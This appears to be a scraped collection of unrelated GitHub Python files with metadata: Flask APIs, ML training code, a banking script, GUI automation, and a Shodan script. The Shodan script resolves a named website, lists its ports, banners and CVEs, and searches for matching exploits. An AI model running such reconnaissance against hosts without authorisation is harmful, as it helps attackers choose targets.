38801618139 | from transformers import pipeline
# classifier = pipeline('sentiment-analysis')
# res = classifier(
# 'We are not very happy to introduce pipeline to the transformers repository.')
pipe = pipeline('question-answering')
res = pipe({
'question': 'What is the name of the repository ?',
'context': 'Pipeline have been included in the huggingface/transformers repository'
})
print(res)
| taterboom/simple-tts | index.py | index.py | py | 397 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "transformers.pipeline",
"line_number": 7,
"usage_type": "call"
}
] |
39472235141 | import json
from flask import request, jsonify
from flask_restful import Resource
from werkzeug.exceptions import BadRequest
from managers.brand import BrandManager
from models import RoleType
from models.products import *
from schemas.request.brand import CreateBrandRequestSchema, EditBrandRequestSchema
from schemas.response.brand import (
CreateBrandResponseSchema,
BrandNameOnlyResponseSchema,
)
from utils.decorators import validate_schema, token_required, permission_required
from dotenv import load_dotenv
load_dotenv()
import cloudinary
import cloudinary.uploader
import cloudinary.api
config = cloudinary.config(secure=True)
class Brand(Resource):
@validate_schema(CreateBrandRequestSchema)
@permission_required(RoleType.admin)
def post(self):
# uploaded_files = request.files.get('file', '')
# print(uploaded_files)
# a = request
# print(a)
#
# upload_result = cloudinary.uploader.upload(uploaded_files)
# return jsonify(upload_result)
brand = BrandManager.create(request.get_json())
schema = CreateBrandResponseSchema()
return schema.dumps(brand)
@staticmethod
def get():
brand_name = request.args.get("brand")
schema = CreateBrandResponseSchema()
if not brand_name:
brands = BrandManager.get_all()
brand_name_schema = BrandNameOnlyResponseSchema()
return brand_name_schema.dumps(brands, many=True)
if brand_name == "all":
brands = BrandManager.get_all()
return schema.dumps(brands, many=True)
elif brand_name:
brands = BrandManager.get_by_name(brand_name)
return schema.dumps(brands)
raise BadRequest("You should use query parameters, check the documentation!")
class BrandUpdate(Resource):
@staticmethod
@permission_required(RoleType.admin)
def get(id_):
brand = BrandManager.get_by_id(id_)
schema = CreateBrandResponseSchema()
return schema.dumps(brand)
@staticmethod
@permission_required(RoleType.admin)
@validate_schema(EditBrandRequestSchema)
def put(id_):
brand = BrandManager.edit_brand(id_, request.get_json())
schema = CreateBrandResponseSchema()
return schema.dumps(brand)
@staticmethod
@permission_required(RoleType.admin)
def delete(id_):
result = BrandManager.delete(id_)
return json.dumps(result)
| a-angeliev/Shoecommerce | server/resources/brand.py | brand.py | py | 2,486 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "cloudinary.config",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "flask_restful.Resource",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "managers.... |
38672578742 | import shodan
import requests
from shodan import Shodan
'''
api = Shodan('Insert_your_Shodan_Api_Key')
print(api.search(query='product:nginx', facets='country,org'))
'''
SHODAN_API_KEY = "Insert_your_Shodan_Api_Key"
api = shodan.Shodan(SHODAN_API_KEY)
target = 'www.packtpub.com'
dnsResolve = 'https://api.shodan.io/dns/resolve?hostnames=' + target + '&key=' + SHODAN_API_KEY
Data={}
try:
# First we need to resolve our targets domain to an IP
resolved = requests.get(dnsResolve)
hostIP = resolved.json()[target]
# Then we need to do a Shodan search on that IP
host = api.host(hostIP)
Data['Ip']=host['ip_str']
Data['Organization']=host.get('org')
Data['Operating System']=host.get('OS')
#print ("IP: %s" % host['ip_str'])
#print ("Organization: %s" % host.get('org', 'n/a'))
#print ("Operating System: %s" % host.get('os', 'n/a'))
# Print all banners
for item in host['data']:
Data['Port']=item['port']
Data['Banner']=item['data']
#print ("Port: %s" % item['port'])
#print ("Banner: %s" % item['data'])
# Print vuln information
for item in host['vulns']:
CVE = item.replace('!','')
Data['Vulnerability']=item
print ('Vulns: %s' % item)
exploits = api.exploits.search(CVE)
for item in exploits['matches']:
if item.get('cve')[0] == CVE:
Data['Description']=item.get('description')
print (item.get('description'))
except:
'An error occured'
| MuhammadAli947/shodanCode | ShodanScans.py | ShodanScans.py | py | 1,526 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "shodan.Shodan",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 19,
"usage_type": "call"
}
] |
36211707503 | #file a transaction
#any changes to the users balanace should be reflected in the account file
import datetime
def transaction_options(accounts_path, line_number):
stay_logged_in = True
while stay_logged_in == True:
ask = input('Would you like to make a transaction, return to the homepage, or logout (T/H/L)? ').upper()
if ask == 'T':
transaction(accounts_path, line_number)
elif ask == 'H':
return homepage()
elif ask == 'L':
return logout()
else:
print ('Invalid input')
def transaction(accounts_path, line_number):
person_involved = input('First input the other entity involved in the transaction: ')
transaction_amount = ''
continue_transaction = True
while continue_transaction == True:
money = input("Next tell us the money transferred, if you spent money add a '-' in front of the amount: ")
money_list = []
money_list[:0] = money
if money_list[0] == '-':
money_list[0] = '0'
for num in money_list:
if num.isnumeric() == False:
print ('money only contains numbers')
continue
#if the hyphen was changed to a 0, change it back
if money_list[0] == '0':
money_list[0] = '-'
#convert the list back into a string
for num in money_list:
transaction_amount += num
continue_transaction = False
#ask the user for the date of the transaction
#syntax check for the date
#write the other entity, amount of money, and date into the transaction history file
enter_date = True
while enter_date == True:
date_of_transaction = input('Lastly, tell us the date this transaction occurred, use the format yyyy-mm-dd: ')
format = '%Y-%m-%d'
try:
datetime.datetime.strptime(date_of_transaction, format)
except ValueError:
print ('This is the incorrect date format, please try again')
continue
break
#get the account number so we can open their transaction history
with open(accounts_path, 'r') as accounts_file:
#list of all the lines in the accounts file where each item is 1 line from the file
accounts_list = accounts_file.readlines()
#split the string at index line_number into a list of separate values
split_line = accounts_list[line_number].split(', ')
#if the 2nd element in the split_line list matches the inputted password, the user has successfully logged in
account_number = split_line[0]
#this needs to print on a newline
with open (f'{account_number}.txt', 'a') as transaction_history:
transaction_history.write(f'{person_involved}, {transaction_amount}, {date_of_transaction}\n')
#open the file
#find the line where the account number matches
#change the balance value
#re write the whole file
# with open(accounts_path, 'r') as accounts_file:
# #list of all the lines in the accounts file where each item is 1 line from the file
# accounts_list = accounts_file.readlines()
# #split the string at index line_number into a list of separate values
# split_line = accounts_list[line_number].split(', ')
# #if the 2nd element in the split_line list matches the inputted password, the user has successfully logged in
# account_number = split_line[4]
def homepage():
print ('Returning to the homepage')
return True
def logout():
print ('Logging you out now, returning to login screen')
return False
| 2105-may24-devops/fletcher-project0 | transaction_module.py | transaction_module.py | py | 3,661 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.strptime",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 57,
"usage_type": "attribute"
}
] |
11371604753 | import logging
from sklearn.metrics import accuracy_score
from pytorch_tabular import TabularModel
from pytorch_tabular.config import DataConfig, OptimizerConfig, TrainerConfig
from ml.solvers.base_solver import Solver
class PytorchTabularSolver(Solver):
def init_model(self):
super(PytorchTabularSolver, self).init_model()
data_config = DataConfig(
target=['Y'],
# target should always be a list. Multi-targets are only supported for regression. Multi-Task Classification is not implemented
continuous_cols=list(self.val_loader.df_data[0].select_dtypes(include=['int64']).columns),
categorical_cols=list(self.val_loader.df_data[0].select_dtypes(include=['object', 'uint8']).columns),
validation_split=0.0)
trainer_config = TrainerConfig(**self.config.trainer.params.dict()) # index of the GPU to use. 0, means CPU
optimizer_config = OptimizerConfig()
self.model = TabularModel(data_config=data_config,
model_config=self.model,
optimizer_config=optimizer_config,
trainer_config=trainer_config)
def load_model(self):
try:
self.model = TabularModel.load_from_checkpoint(self.result_dir)
except FileNotFoundError as e:
logging.info('No saved model found: no model is loaded.')
def train(self):
"""
Training the tree based networks.
Save the model if it has better performance than the previous ones.
"""
self.model.fit(train=self.train_loader.df,
validation=self.val_loader.df)
# save model
self.model.save_model(self.result_dir)
self.eval()
self.save_acc()
def eval(self):
"""
Evaluate the model.
"""
preds = self.model.predict(self.val_loader.df_data[0]).prediction.to_numpy()
gt = self.val_loader.data[1]
self.accuracy = accuracy_score(preds, gt)
print(self.accuracy)
if self.config.env.save_preds:
self.save_preds(preds)
| gregiberri/coupon | ml/solvers/pytorch_tabular_solver.py | pytorch_tabular_solver.py | py | 2,165 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "ml.solvers.base_solver.Solver",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "pytorch_tabular.config.DataConfig",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pytorch_tabular.config.TrainerConfig",
"line_number": 20,
"usage_type": "... |
40587003321 | from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.decorators import login_required
from django.http import (HttpRequest, HttpResponse, HttpResponseNotFound,
HttpResponseRedirect)
from django.shortcuts import redirect, render
from django.urls import reverse_lazy
from django.views.decorators.cache import cache_page
from core import constants as const
from core.db_queries import Query
INDEX_URL = reverse_lazy('questions:index')
QUESTIONS_URL = reverse_lazy('questions:questions')
FINISH_URL = reverse_lazy('questions:finish_test')
# @cache_page(timeout=20, key_prefix='index') # 10 minutes
def index(request: HttpRequest):
"""Обработчик для главной страницы.
"""
context = {
'title' : const.TITLE,
'card_header' : const.INDEX_CARD_HEADER,
'index_page_text' : const.INDEX_PAGE_TEXT,
'maximum_grade' : Query.get_maximum_grade(),
}
return render(request, 'index.html', context)
# @cache_page(timeout=60, key_prefix='rating') # 1 minute
def rating(request: HttpRequest):
"""Показывает рейтинг пользователей.
"""
context = {
'title' : const.TITLE,
'header' : const.ALL_RESULTS_CARD_HEADER,
'results' : Query.get_users_rating()
}
return render(request, 'questions/results.html', context)
@login_required
def my_results(request: HttpRequest):
"""Показывает все результаты текущего пользователя.
"""
user: AbstractBaseUser = request.user
context = {
'title' : const.TITLE,
'header' : const.MY_RESULTS_CARD_HEADER,
'results' : Query.get_user_results(user)
}
return render(request, 'questions/results.html', context)
def get_question(
request: HttpRequest
):
"""Выводит очередной вопрос и учитывает ответы.
Если предыдущий тест был случайно прерван, продолжит предыдущий тест.
"""
user: AbstractBaseUser = request.user
if user.is_anonymous:
return redirect(INDEX_URL)
question = Query.get_next_question(user=user)
if question is None:
return redirect(FINISH_URL)
context = {
'title' : const.TITLE,
'question' : question,
'button_type' : ('radio', 'checkbox')[question.many_answers]
}
return render(request, 'questions/question.html', context)
@login_required
def add_answer(
request: HttpRequest,
question_pk: int
):
"""Учитывает переданные пользователем ответы.
"""
question = Query.get_current_question(
question_pk=question_pk
)
if question is None:
return HttpResponseNotFound('<h1>Page not found</h1>')
context = {
'title' : const.TITLE,
'question' : question,
'button_type' : ('radio', 'checkbox')[question.many_answers]
}
choice = request.POST.getlist('answer')
if not choice:
context['error_message'] = const.ERR_NO_ANSWERS
return render(request, 'questions/question.html', context)
if not Query.update_result(
user =request.user,
question_pk =question_pk,
choice =choice
):
context['error_message'] = const.ERR_FALSE_ANSWERS
return render(request, 'questions/question.html', context)
return redirect(QUESTIONS_URL)
def to_finish_test(
request: HttpRequest
) -> HttpResponse | HttpResponseRedirect:
"""Завершает тест.
Если пользователь не проходил тестов, либо пытается завершить без
отмеченных ответов, перекидывает на главную страницу.
Начатый тест будет продолжен в дальнейшем.
"""
user: AbstractBaseUser = request.user
if user.is_anonymous:
return redirect(INDEX_URL)
closed, current_result = Query.close_last_result(user)
if not closed:
return redirect(INDEX_URL)
context = {
'title' : const.TITLE,
'header' : const.FINISH_CARD_HEADER,
'result' : current_result
}
return render(request, 'questions/finish.html', context)
| Xewus/Examiner | src/questions/views.py | views.py | py | 4,430 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.reverse_lazy",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "django.urls.reverse_lazy",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "django.urls.reverse_lazy",
"line_number": 14,
"usage_type": "call"
},
{
"api_na... |
39479105306 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand, CommandError
from cards.search import searchservice
from cards.models import Card, BaseCard
from cards.models import PhysicalCard
import json
from django.utils import dateparse
import codecs
import sys
from elasticsearch import Elasticsearch, exceptions
from kitchen.text.converters import getwriter
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('--full', dest='full', action='store_true',
help='Rebuild the entire index, not just data that has changed.')
def handle(self, *args, **options):
# check the card index
self.checkCardIndex()
self.checkCardnameIndex()
# first, let's get the most recent doc change in ES:
lmt_q = {
"query": {"match_all": {}},
"size": 1,
"sort": [
{
"_update_datetime": {
"order": "desc"
}
}
]
}
lmt_res = searchservice.search(index='card', body=lmt_q)
last_time = None
try:
sys.stdout.write("timestamp: {}\n".format(json.dumps(lmt_res['hits']['hits'][0]['_source']['_update_datetime'])))
last_time = dateparse.parse_datetime(lmt_res['hits']['hits'][0]['_source']['_update_datetime'])
except KeyError:
# no doc, I guess
pass
sys.stdout.write("'card' index last updated {}\n".format(last_time))
pcs = None
if not last_time or options['full']:
sys.stdout.write("Re-indexing entire card database...\n")
pcs = PhysicalCard.objects.all()
#pcs = PhysicalCard.objects.filter(pk__gte=15200, pk__lt=15800)
else:
cards = Card.objects.filter(updated_at__gte=last_time)
bc_ids = {}
for card in cards:
bc_ids[card.basecard_id] = True
basecards = BaseCard.objects.filter(updated_at__gte=last_time)
pc_ids = {}
for basecard in basecards:
#sys.stderr.write("bc -> pc {}\n".format(basecard.physicalcard_id))
pc_ids[basecard.physicalcard_id] = True
basecards = BaseCard.objects.filter(id__in=[bc_id for bc_id in bc_ids])
for basecard in basecards:
pc_ids[basecard.physicalcard_id] = True
pcs = PhysicalCard.objects.filter(id__in=[pc_id for pc_id in pc_ids])
total_count = pcs.count()
counter = 0
sys.stdout.write("Cards to index: {}\n".format(total_count))
for pc in pcs:
searchservice.index_physicalcard(pc)
counter += 1
if counter % 100 == 0:
sys.stdout.write("{:>6} : {:>4.0%} complete\n".format(counter, float(counter) / float(total_count)))
sys.stdout.write("Complete!\n")
def checkCardIndex(self):
index_name = 'card'
try:
val = searchservice._es.indices.get_settings(index_name)
except exceptions.NotFoundError:
sys.stdout.write("'{}' index does not exist. Creating it...\n".format(index_name))
searchservice._es.indices.create(index=index_name,
body={})
return True
def checkCardnameIndex(self):
index_name = 'cardname'
cur_mappings = None
try:
cur_mappings = searchservice._es.indices.get_mapping(index_name)
except exceptions.NotFoundError:
sys.stdout.write("'{}' index does not exist. Creating it...\n".format(index_name))
with open('elasticsearch/cardname_settings.json', 'r') as cnsjson_fh:
cns = json.load(cnsjson_fh)
sys.stdout.write("Creating '{}' index with:\n{}\n".format(index_name, json.dumps(cns, indent=2)))
searchservice._es.indices.create(index=index_name,
body=cns)
if cur_mappings:
# we need to validate that there is an ngram field on the "name" property. If there isn't, we should bail.
# cur_settings['cardname']['settings']['index']
# BOOKMARK - check to see if there is an ngram mappings on "name"
try:
ngram = cur_mappings[index_name]['mappings']['cardname']['properties']['name']['fields']['ngram']
slug = cur_mappings[index_name]['mappings']['cardname']['properties']['slug']
lmvid = cur_mappings[index_name]['mappings']['cardname']['properties']['latest_multiverseid']
except KeyError as ke:
sys.stdout.write("{} index does not have an 'ngram' field on 'name'.\n".format(index_name))
sys.stdout.write("{} index Mappings:\n{}\n".format(index_name, json.dumps(cur_mappings, indent=2)))
sys.stdout.write("Aborting.\n")
# You may need to drop the old index and start over.
sys.stdout.write("Try this to get the index started...\n")
sys.stdout.write("curl -X DELETE '{}:{}/{}?pretty'\n".format(searchservice._host, searchservice._port, index_name))
sys.stdout.write(
"curl -X PUT '{}:{}/{}?pretty' -H 'Content-Type: application/json' -d @elasticsearch/cardname_settings.json\n".format(
searchservice._host,
searchservice._port,
index_name))
raise ke
return True
| jcrickmer/mtgdbpy | cards/management/commands/reindex_es.py | reindex_es.py | py | 5,648 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "cards.search.searchservice.search",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "cards.search.searchservice",
"line_number": 45,
"usage_type": "... |
26419037040 | import datetime
from functools import wraps
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
def authentication_required(function=None):
def decorator(view_func):
@wraps(view_func)
def _wrapped_view(request, *args, **kwargs):
session = request.session
if session.get("provider") \
and session.get("patient_id") \
and session.get("patient") \
and session.get("access_token") \
and session.get("expiration"):
expiration = session.get("expiration")
if isinstance(expiration, datetime.datetime) and expiration > timezone.now():
return view_func(request, *args, **kwargs)
# Clear the session if authentication failed.
request.session.flush()
return HttpResponseRedirect(reverse("pisces:index"))
return _wrapped_view
if function:
return decorator(function)
return decorator
| qiuosier/Pisces | decorators.py | decorators.py | py | 1,068 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "django.utils.timezone.now",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "django.utils.timezone",
"line_number": 19,
"usage_type": "name"
},
{
"api_name":... |
73574130663 | import torch
import torch.nn as nn
import torch.nn.functional as F
from policy import discrete_policy_net
from critic import attention_critic
import numpy as np
from buffer import replay_buffer
from make_env import make_env
import os
import random
from gym.spaces.discrete import Discrete
from gym.spaces.box import Box
import time
class maac_mpe(object):
def __init__(self, env_id, batch_size, learning_rate, exploration, episode, gamma, alpha, capacity, rho, update_iter, update_every, head_dim, traj_len, render):
self.env_id = env_id
#self.env = make_env(self.env_id, discrete_action=True)
self.env = make_env(self.env_id)
self.batch_size = batch_size
self.learning_rate = learning_rate
self.exploration = exploration
self.episode = episode
self.gamma = gamma
self.capacity = capacity
self.rho = rho
self.update_iter = update_iter
self.update_every = update_every
self.head_dim = head_dim
self.traj_len = traj_len
self.render = render
self.observation_dims = [int(self.env.observation_space[i].shape[0]) for i in range(self.env.n)]
self.action_dims = [int(self.env.action_space[i].n) if isinstance(self.env.action_space[i], Discrete) else int(sum(self.env.action_space[i].high) + self.env.action_space[i].shape) for i in range(self.env.n)]
self.alphas = [alpha for _ in range(self.env.n)]
self.value_net = attention_critic(num_agent=self.env.n, sa_dims=[o + a for o, a in zip(self.observation_dims, self.action_dims)], s_dims=self.observation_dims, head_dim=self.head_dim, output_dim=self.action_dims)
self.target_value_net = attention_critic(num_agent=self.env.n, sa_dims=[o + a for o, a in zip(self.observation_dims, self.action_dims)], s_dims=self.observation_dims, head_dim=self.head_dim, output_dim=self.action_dims)
self.policy_nets = [discrete_policy_net(input_dim=self.observation_dims[n], output_dim=self.action_dims[n]) for n in range(self.env.n)]
self.target_policy_nets = [discrete_policy_net(input_dim=self.observation_dims[n], output_dim=self.action_dims[n]) for n in range(self.env.n)]
[self.target_policy_nets[n].load_state_dict(self.policy_nets[n].state_dict()) for n in range(self.env.n)]
self.target_value_net.load_state_dict(self.value_net.state_dict())
self.buffer = replay_buffer(capacity=self.capacity)
self.value_optimizer = torch.optim.Adam(self.value_net.parameters(), lr=self.learning_rate, weight_decay=1e-3)
self.policy_optimizers = [torch.optim.Adam(self.policy_nets[n].parameters(), lr=self.learning_rate) for n in range(self.env.n)]
self.count = 0
self.train_count = 0
def soft_value_update(self):
for param, target_param in zip(self.value_net.parameters(), self.target_value_net.parameters()):
target_param.detach().copy_(param.detach() * (1 - self.rho) + target_param.detach() * self.rho)
def soft_policy_update(self, policy_idx):
for param, target_param in zip(self.policy_nets[policy_idx].parameters(), self.target_policy_nets[policy_idx].parameters()):
target_param.detach().copy_(param.detach() * (1 - self.rho) + target_param.detach() * self.rho)
def train(self):
for _ in range(self.update_iter):
observations, actions, rewards, next_observations, dones = self.buffer.sample(self.batch_size)
indiv_observations = [torch.FloatTensor(np.vstack([observations[b][n] for b in range(self.batch_size)])) for n in range(self.env.n)]
indiv_actions = [torch.FloatTensor([actions[b][n] for b in range(self.batch_size)]) for n in range(self.env.n)]
one_hot_indiv_actions = [torch.zeros(self.batch_size, self.action_dims[n]) for n in range(self.env.n)]
one_hot_indiv_actions =[one_hot_indiv_actions[n].scatter(dim=1, index=indiv_actions[n].unsqueeze(1).long(), value=1) for n in range(self.env.n)]
rewards = torch.FloatTensor(rewards)
indiv_rewards = [rewards[:, n] for n in range(self.env.n)]
indiv_next_observations = [torch.FloatTensor(np.vstack([next_observations[b][n] for b in range(self.batch_size)])) for n in range(self.env.n)]
dones = torch.FloatTensor(dones)
indiv_dones = [dones[:, n] for n in range(self.env.n)]
# * many times to train for same batch trajectories
# * Critic training
one_hot_next_actions = []
next_actions = []
next_log_policies = []
for i in range(self.env.n):
# * sampling all actions, a, from all agents’ current policies in order to calculate the gradient estimate for agent i
next_action, next_log_policy = self.target_policy_nets[i].forward(indiv_next_observations[i], log=True)
next_log_policies.append(next_log_policy)
next_actions.append(next_action)
one_hot_next_action = torch.zeros(self.batch_size, self.action_dims[i])
one_hot_next_action.scatter_(dim=1, index=next_action, value=1)
one_hot_next_actions.append(one_hot_next_action)
next_q = self.target_value_net.forward(indiv_next_observations, one_hot_next_actions)
q, reg_atten = self.value_net.forward(indiv_observations, one_hot_indiv_actions, reg=True)
value_loss = 0
for i in range(self.env.n):
# * soft operation: - self.alphas[i] * next_log_policies[i]
target_q = indiv_rewards[i].unsqueeze(1) + (1 - indiv_dones[i].unsqueeze(1)) * self.gamma * next_q[i] - self.alphas[i] * next_log_policies[i]
target_q = target_q.detach()
value_loss += (q[i] - target_q).pow(2).mean()
for reg_a in reg_atten:
value_loss += reg_a
self.value_optimizer.zero_grad()
value_loss.backward()
# * scale the shared parameters' grad
for p in self.value_net.get_shared_parameters():
p.grad.data.mul_(1. / self.env.n)
nn.utils.clip_grad_norm_(self.value_net.parameters(), 10 * self.env.n)
self.value_optimizer.step()
one_hot_sample_actions = []
sample_actions = []
log_policies = []
entropies = []
all_policies = []
reg_policies = []
for i in range(self.env.n):
# * sampling all actions, a, from all agents’ current policies in order to calculate the gradient estimate for agent i
sample_action, reg_policy, log_policy, entropy, all_policy = self.policy_nets[i].forward(indiv_observations[i], explore=True, log=True, reg=True, entropy=True, all=True)
sample_actions.append(sample_action)
reg_policies.append(reg_policy)
log_policies.append(log_policy)
entropies.append(entropy)
all_policies.append(all_policy)
one_hot_sample_action = torch.zeros(self.batch_size, self.action_dims[i])
one_hot_sample_action.scatter_(dim=1, index=sample_action, value=1)
one_hot_sample_actions.append(one_hot_sample_action)
q, all_q = self.value_net(indiv_observations, one_hot_sample_actions, all=True)
for i in range(self.env.n):
b = torch.sum(all_policies[i] * all_q[i], dim=1, keepdim=True).detach()
# * COMA
adv = (q[i] - b).detach()
# * soft operation: self.alphas[i] * log_policies[i]
policy_loss = log_policies[i] * (self.alphas[i] * log_policies[i] - adv).detach()
policy_loss = policy_loss.mean() + reg_policies[i] * 1e-3
self.policy_optimizers[i].zero_grad()
for p in self.value_net.parameters():
p.requires_grad = False
policy_loss.backward()
for p in self.value_net.parameters():
p.requires_grad = True
nn.utils.clip_grad_norm_(self.policy_nets[i].parameters(), 0.5)
self.policy_optimizers[i].step()
self.soft_value_update()
for i in range(self.env.n):
self.soft_policy_update(i)
def run(self):
max_reward = -np.inf
weight_reward = [None for i in range(self.env.n)]
for epi in range(self.episode):
self.env.reset()
if self.render:
self.env.render()
total_reward = [0 for i in range(self.env.n)]
obs = self.env.reset()
while True:
action_indice = []
actions = []
for i in range(self.env.n):
if epi >= self.exploration:
action_idx = self.policy_nets[i].forward(torch.FloatTensor(np.expand_dims(obs[i], 0)), explore=True).item()
else:
action_idx = np.random.choice(list(range(self.action_dims[i])))
action = np.zeros(self.action_dims[i])
action[action_idx] = 1
actions.append(action)
action_indice.append(action_idx)
next_obs, reward, done, _ = self.env.step(actions)
if self.render:
self.env.render()
self.buffer.store(obs, action_indice, reward, next_obs, done)
self.count += 1
total_reward = [tr + r for tr, r in zip(total_reward, reward)]
obs = next_obs
if (self.count % self.update_every) == 0 and epi >= self.exploration and self.batch_size <= len(self.buffer):
self.train_count += 1
self.train()
if self.count % self.traj_len == 0:
done = [True for _ in range(self.env.n)]
if any(done):
if weight_reward[0] is None:
weight_reward = total_reward
else:
weight_reward = [wr * 0.99 + tr * 0.01 for wr, tr in zip(weight_reward, total_reward)]
if sum(weight_reward) > max_reward and epi >= self.exploration:
torch.save(self.value_net, './models/{}/value.pkl'.format(self.env_id))
for i in range(self.env.n):
torch.save(self.policy_nets[i], './models/{}/policy{}.pkl'.format(self.env_id, i))
max_reward = sum(weight_reward)
print(('episode: {}\ttrain_count:{}\tweight_reward:' + '{:.1f}\t' * self.env.n + 'sum:{:.1f}').format(epi + 1, self.train_count, *weight_reward, sum(weight_reward)))
break
def eval(self, render=True):
self.count = 0
for i in range(self.env.n):
self.policy_nets[i] = torch.load('./models/{}/policy{}.pkl'.format(self.env_id, i))
while True:
obs = self.env.reset()
total_reward = [0 for i in range(self.env.n)]
if render:
self.env.render()
while True:
time.sleep(0.05)
actions = []
for n in range(self.env.n):
action = np.zeros(self.action_dims[i])
action_idx = self.policy_nets[i].forward(torch.FloatTensor(np.expand_dims(obs[i], 0)), explore=True).item()
action[action_idx] = 1
actions.append(action)
next_obs, reward, done, info = self.env.step(actions)
if render:
self.env.render()
total_reward = [total_reward[i] + reward[i] for i in range(self.env.n)]
obs = next_obs
self.count += 1
if any(done) or self.count % self.traj_len == 0:
print('episode: {}\treward: {}'.format(i + 1, total_reward))
break
| deligentfool/MAAC_pytorch | model_mpe.py | model_mpe.py | py | 12,313 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "make_env.make_env",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "gym.spaces.discrete.Discrete",
"line_number": 34,
"usage_type": "argument"
},
{
"api_name": "critic.attention_critic",
"line_number": 38,
"usage_type": "call"
},
{
"api_na... |
38650316304 | #%%
import pyautogui, pyperclip
Y = 550 # 507
X = 800 # 740
pyperclip.copy("직")
pyautogui.moveTo(x=X, y=Y, duration=0.001)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
pyperclip.copy("업")
pyautogui.moveTo(x=X, y=Y, duration=1)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
pyperclip.copy("상")
pyautogui.moveTo(x=X, y=Y, duration=1)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
pyperclip.copy("담")
pyautogui.moveTo(x=X, y=Y, duration=1)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
pyperclip.copy("사")
pyautogui.moveTo(x=X, y=Y, duration=1)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
print(pyautogui.position())
print(pyautogui.size())
print(pyautogui.onScreen(1000,2000))
print(pyautogui.onScreen(1000,1000))
# x 740 / y 507
#%%
# OCR
import pytesseract, pyautogui
from PIL import ImageGrab
from textblob import TextBlob
pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract'
screen = ImageGrab.grab(bbox=(600, 300, 1200, 800))
w = screen.convert('L')
w.save('/Users/shetshield/Desktop/python_ws/grabbed.png')
text = pytesseract.image_to_string(w)
arr = text.split('\n')[0:-1]
res = '\n'.join(arr)
# correctedText = TextBlob(text).correct().string
# print(correctedText)
print(res)
| shetshield/src | stitching_img/pymacro.py | pymacro.py | py | 1,353 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pyperclip.copy",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pyautogui.moveTo",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pyautogui.click",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pyautogui.hotkey",
"... |
38313990919 | from flask import flash
from flask_app.config.mysqlconnection import connectToMySQL
from flask_app.models import user
from flask_app.models import message
class Event:
db = "plannendar_schema"
def __init__(self, data):
self.id = data['id']
self.event = data['event']
self.description = data['description']
self.activities = data['activities']
self.start_date = data['start_date']
self.end_date = data['end_date']
self.location = data['location']
self.user_id = data['user_id']
self.created_at = data['created_at']
self.updated_at = data['updated_at']
self.creator = None
@classmethod
def save(cls, data):
query = "INSERT INTO events (event, description, activities, start_date, end_date, location, user_id) VALUES (%(event)s,%(description)s,%(activities)s,%(start_date)s,%(end_date)s,%(location)s,%(user_id)s);"
return connectToMySQL(cls.db).query_db(query, data)
@classmethod
def add_guests(cls, data):
query = 'INSERT INTO guests (event_id, user_id) VALUES (%(event_id)s,%(user_id)s);'
return connectToMySQL(cls.db).query_db(query, data)
@classmethod
def get_all(cls):
query = '''SELECT * FROM events
JOIN users
ON events.user_id = users.id;'''
results = connectToMySQL(cls.db).query_db(query)
all_events = []
for row in results:
one_event = cls(row)
user_data = {
"id": row["users.id"],
"first_name": row["first_name"],
"last_name": row["last_name"],
"email": row["email"],
"password": "not telling",
"created_at": row["users.created_at"],
"updated_at": row["users.updated_at"]
}
one_event.guests = user.User.get_event_guests(
{"event_id": one_event.id})
one_event.creator = user.User(user_data)
all_events.append(one_event)
return all_events
@classmethod
def get_user_events(cls, data):
query = """SELECT * FROM events
JOIN users
ON events.user_id = users.id
WHERE events.id = %(id)s;"""
results = connectToMySQL(cls.db).query_db(query, data)
for row in results:
one_event = cls(row)
user_data = {
"id": row["users.id"],
"first_name": row["first_name"],
"last_name": row["last_name"],
"email": row["email"],
"password": "not telling",
"created_at": row["users.created_at"],
"updated_at": row["users.updated_at"]
}
one_event.creator = user.User(user_data)
return one_event
@classmethod # get by the ID, appending the messages into empty list
def get_one(cls, data):
query = """SELECT * FROM events
LEFT JOIN messages
ON events.id = messages.event_id
WHERE events.id = %(id)s;"""
results = connectToMySQL(cls.db).query_db(query, data)
event = cls(results[0])
event.guests = user.User.get_event_guests({"event_id": event.id})
event.messages = []
for row in results:
message_row = {
"id": row['messages.id'],
"content": row['content'],
"user_id": row['messages.user_id'],
"event_id": row['event_id'],
"created_at": row['messages.created_at'],
"updated_at": row['messages.updated_at']
}
one_message = message.Message(message_row)
